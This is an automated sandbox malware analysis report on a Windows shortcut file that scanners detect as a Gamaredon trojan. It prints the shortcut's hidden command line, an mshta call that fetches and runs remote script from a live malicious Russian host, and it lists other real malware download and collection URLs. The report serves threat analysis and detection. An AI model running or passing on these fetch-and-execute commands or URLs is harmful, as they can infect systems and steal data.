Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
442.111).lnk

Overview

General Information

Sample Name:442.111).lnk
Original Sample Name: ( 2201605000000123 09.08.2022 .1 .111).lnk
Analysis ID:819396
MD5:f46a6211920dd75729aaee4ac9cd0856
SHA1:ff73c02c31e4930c5567ad049cfdf7f7c2ca49ab
SHA256:a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Found URL in windows shortcut file (LNK)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
IP address seen in connection with other malware

Classification

  • System is w10x64
  • mshta.exe (PID: 3884 cmdline: "C:\Windows\System32\mshta.exe" http://a0705880.xsph.ru/selection/seedling.txt /f MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 442.111).lnkAvira: detected
Source: 442.111).lnkReversingLabs: Detection: 73%
Source: 442.111).lnkVirustotal: Detection: 60%Perma Link
Source: global trafficHTTP traffic detected: GET /selection/seedling.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a0705880.xsph.ruConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
Source: unknownDNS traffic detected: queries for: a0705880.xsph.ru
Source: global trafficHTTP traffic detected: GET /selection/seedling.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a0705880.xsph.ruConnection: Keep-Alive
Source: mshta.exe, 00000000.00000002.558169772.0000017DD8CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a0705880.xsph.ru/selectioedling.txt...
Source: mshta.exe, 00000000.00000002.558169772.0000017DD8C30000.00000004.00000020.00020000.00000000.sdmp, 442.111).lnkString found in binary or memory: http://a0705880.xsph.ru/selection/seedling.txt
Source: mshta.exe, 00000000.00000002.558169772.0000017DD8C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a0705880.xsph.ru/selection/seedling.txt...
Source: mshta.exe, 00000000.00000002.558121703.0000017DD8B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a0705880.xsph.ru/selection/seedling.txt/fonsLOCA
Source: mshta.exe, 00000000.00000002.558169772.0000017DD8C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a0705880.xsph.ru/selection/seedling.txt5&
Source: mshta.exe, 00000000.00000002.558169772.0000017DD8C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a0705880.xsph.ru/selection/seedling.txtINetCookies
Source: mshta.exe, 00000000.00000002.558602989.00000185DA9C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0705880.xsph.ru/selection/seedling.txth1j
Source: mshta.exe, 00000000.00000002.558169772.0000017DD8CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comMicrosoft

System Summary

barindex
Source: Initial fileStrings: http://a0705880.xsph.ru/selection/seedling.txt
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: 442.111).lnkReversingLabs: Detection: 73%
Source: 442.111).lnkVirustotal: Detection: 60%
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: classification engineClassification label: mal60.rans.winLNK@1/0@1/1
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: mshta.exe, 00000000.00000002.558169772.0000017DD8C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.558169772.0000017DD8D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000000.00000002.558169772.0000017DD8C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW N
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping1
Security Software Discovery
Remote Services1
Email Collection
Exfiltration Over Other Network Medium2
Non-Application Layer Protocol
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Ingress Tool Transfer
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
442.111).lnk73%ReversingLabsShortcut.Trojan.Gamaredon
442.111).lnk61%VirustotalBrowse
442.111).lnk100%AviraLNK/YAV.Minerva.AH
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
a0705880.xsph.ru
141.8.197.42
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    http://a0705880.xsph.ru/selection/seedling.txtfalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://a0705880.xsph.ru/selection/seedling.txtINetCookiesmshta.exe, 00000000.00000002.558169772.0000017DD8C83000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://a0705880.xsph.ru/selection/seedling.txt/fonsLOCAmshta.exe, 00000000.00000002.558121703.0000017DD8B90000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://a0705880.xsph.ru/selection/seedling.txth1jmshta.exe, 00000000.00000002.558602989.00000185DA9C8000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://a0705880.xsph.ru/selection/seedling.txt5&mshta.exe, 00000000.00000002.558169772.0000017DD8C39000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://a0705880.xsph.ru/selectioedling.txt...mshta.exe, 00000000.00000002.558169772.0000017DD8CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://a0705880.xsph.ru/selection/seedling.txt...mshta.exe, 00000000.00000002.558169772.0000017DD8C83000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  141.8.197.42
                  a0705880.xsph.ruRussian Federation
                  35278SPRINTHOSTRUfalse
                  Joe Sandbox Version:37.0.0 Beryl
                  Analysis ID:819396
                  Start date and time:2023-03-03 14:24:00 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 4m 46s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:442.111).lnk
                  Original Sample Name: ( 2201605000000123 09.08.2022 .1 .111).lnk
                  Detection:MAL
                  Classification:mal60.rans.winLNK@1/0@1/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .lnk
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, ctldl.windowsupdate.com, config.edge.skype.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  141.8.197.42htmlayout.dllGet hashmaliciousUnknownBrowse
                  • a0747694.xsph.ru/serv.php
                  qRsw2oZH24.exeGet hashmaliciousPanda StealerBrowse
                  • crimestreetsru.ru.xsph.ru/collect.php
                  svchost.exeGet hashmaliciousPanda StealerBrowse
                  • asdqwezxc.ru.xsph.ru/collect.php
                  btwGaban.exeGet hashmaliciousCollectorGoomba, Panda StealerBrowse
                  • a0680922.xsph.ru/collect.php
                  v8YnxUbz23.exeGet hashmaliciousAmadey RedLine SmokeLoader Tofsee VidarBrowse
                  • a0620960.xsph.ru/5.exe
                  6CQieC3oMC.exeGet hashmaliciousAmadey Raccoon RedLine SmokeLoader Tofsee VidarBrowse
                  • a0620960.xsph.ru/5.exe
                  Oo8GcnVrGH.exeGet hashmaliciousRaccoon RedLine SmokeLoader Tofsee VidarBrowse
                  • a0620960.xsph.ru/5.exe
                  ADNOC RFQ 88556524.xlsxGet hashmaliciousUnknownBrowse
                  • a0599932.xsph.ru/GrBwWewiSjoPFvO.exe
                  P5dD4xbWeX.exeGet hashmaliciousUnknownBrowse
                  • a0568605.xsph.ru/forinstalls2.exe
                  294J8weDKq.exeGet hashmaliciousBlackNETBrowse
                  • a0541862.xsph.ru//getCommand.php?id=VGVzdF85MDI1MTczQw
                  KVINC5FNPj.exeGet hashmaliciousUnknownBrowse
                  • a0510942.xsph.ru/gate.php
                  uZS3kvK3Q6.exeGet hashmaliciousUnknownBrowse
                  • a0480986.xsph.ru/api/download.get
                  windows.exeGet hashmaliciousPoullightBrowse
                  • f0427103.xsph.ru/gate.php
                  Xenos (2).exeGet hashmaliciousUnknownBrowse
                  • a0458390.xsph.ru/upload.php
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  SPRINTHOSTRUQ5yt25J9dn.exeGet hashmaliciousDCRatBrowse
                  • 141.8.197.42
                  file.exeGet hashmaliciousTofseeBrowse
                  • 176.119.147.35
                  EVJ7EK56lk.exeGet hashmaliciousDCRatBrowse
                  • 141.8.192.93
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.89.37
                  Proof_Of_Payment.pdf.scr.exeGet hashmaliciousSmokeLoaderBrowse
                  • 141.8.199.215
                  HEUR-Trojan-Spy.MSIL.Stealer.gen-159b77616b80.exeGet hashmaliciousDCRatBrowse
                  • 141.8.197.42
                  0QKmSZaW7J.exeGet hashmaliciousDCRatBrowse
                  • 141.8.193.236
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  file.exeGet hashmaliciousTofseeBrowse
                  • 185.251.90.136
                  No context
                  No context
                  No created / dropped files found
                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=16, Archive, ctime=Sun Mar 17 02:37:39 2019, mtime=Sun Mar 17 02:37:39 2019, atime=Sun Mar 17 02:37:39 2019, length=13824, window=hide
                  Entropy (8bit):2.988124188685584
                  TrID:
                  • Windows Shortcut (20020/1) 100.00%
                  File name:442.111).lnk
                  File size:1708
                  MD5:f46a6211920dd75729aaee4ac9cd0856
                  SHA1:ff73c02c31e4930c5567ad049cfdf7f7c2ca49ab
                  SHA256:a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7
                  SHA512:af9a59e5cfa24f9354ad97b5520648f4d116d01e5a42e824cacade6f31eddd795f656bf435f7d33b6946252b262d525e3f3bc8404160f53ebb31a4882754715a
                  SSDEEP:24:8TS9cDpAQSogbU88ANOs8LA6l4kkDjRo0loIho0eBzabTSymW:8TDkJaAO4DjRoOola3d
                  TLSH:E331E30817941A21E6349D3768DAD20249357406DD82DE3F12D0569CAC23601FB7DCAE
                  File Content Preview:L..................F.... ....OY.r....OY.r....OY.r....6....................../....P.O. .:i.....+00.../C:\...................R.1.....(Sq2..Windows.<........:..(Sq2*.........................W.i.n.d.o.w.s.....V.1......U.&..System32..>........:...U.&*.........
                  Icon Hash:60ecece4f0e1e9cd

                  General

                  Relative Path:
                  Command Line Argument:http://a0705880.xsph.ru/selection/seedling.txt /f
                  Icon location:%systemroot%\system32\mmcndmgr.dll
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 3, 2023 14:24:53.851448059 CET4970280192.168.2.5141.8.197.42
                  Mar 3, 2023 14:24:53.907932043 CET8049702141.8.197.42192.168.2.5
                  Mar 3, 2023 14:24:53.908152103 CET4970280192.168.2.5141.8.197.42
                  Mar 3, 2023 14:24:53.926029921 CET4970280192.168.2.5141.8.197.42
                  Mar 3, 2023 14:24:53.980174065 CET8049702141.8.197.42192.168.2.5
                  Mar 3, 2023 14:24:53.980340958 CET8049702141.8.197.42192.168.2.5
                  Mar 3, 2023 14:24:53.980370998 CET8049702141.8.197.42192.168.2.5
                  Mar 3, 2023 14:24:53.980396986 CET8049702141.8.197.42192.168.2.5
                  Mar 3, 2023 14:24:53.980509996 CET4970280192.168.2.5141.8.197.42
                  Mar 3, 2023 14:24:53.983545065 CET4970280192.168.2.5141.8.197.42
                  Mar 3, 2023 14:24:53.984415054 CET4970280192.168.2.5141.8.197.42
                  Mar 3, 2023 14:24:54.037781954 CET8049702141.8.197.42192.168.2.5
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 3, 2023 14:24:53.775871038 CET4917753192.168.2.58.8.8.8
                  Mar 3, 2023 14:24:53.809000015 CET53491778.8.8.8192.168.2.5
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 3, 2023 14:24:53.775871038 CET192.168.2.58.8.8.80x9915Standard query (0)a0705880.xsph.ruA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 3, 2023 14:24:53.809000015 CET8.8.8.8192.168.2.50x9915No error (0)a0705880.xsph.ru141.8.197.42A (IP address)IN (0x0001)false
                  • a0705880.xsph.ru
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.549702141.8.197.4280C:\Windows\System32\mshta.exe
                  TimestampkBytes transferredDirectionData
                  Mar 3, 2023 14:24:53.926029921 CET92OUTGET /selection/seedling.txt HTTP/1.1
                  Accept: */*
                  Accept-Language: en-US
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: a0705880.xsph.ru
                  Connection: Keep-Alive
                  Mar 3, 2023 14:24:53.980340958 CET93INHTTP/1.1 400 Bad Request
                  Server: openresty
                  Date: Fri, 03 Mar 2023 13:24:53 GMT
                  Content-Type: text/html
                  Content-Length: 556
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61
                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE a
                  Mar 3, 2023 14:24:53.980370998 CET93INData Raw: 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e
                  Data Ascii: nd Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Click to jump to process

                  Click to jump to process

                  Target ID:0
                  Start time:14:24:52
                  Start date:03/03/2023
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\mshta.exe" http://a0705880.xsph.ru/selection/seedling.txt /f
                  Imagebase:0x7ff7e8ff0000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  No disassembly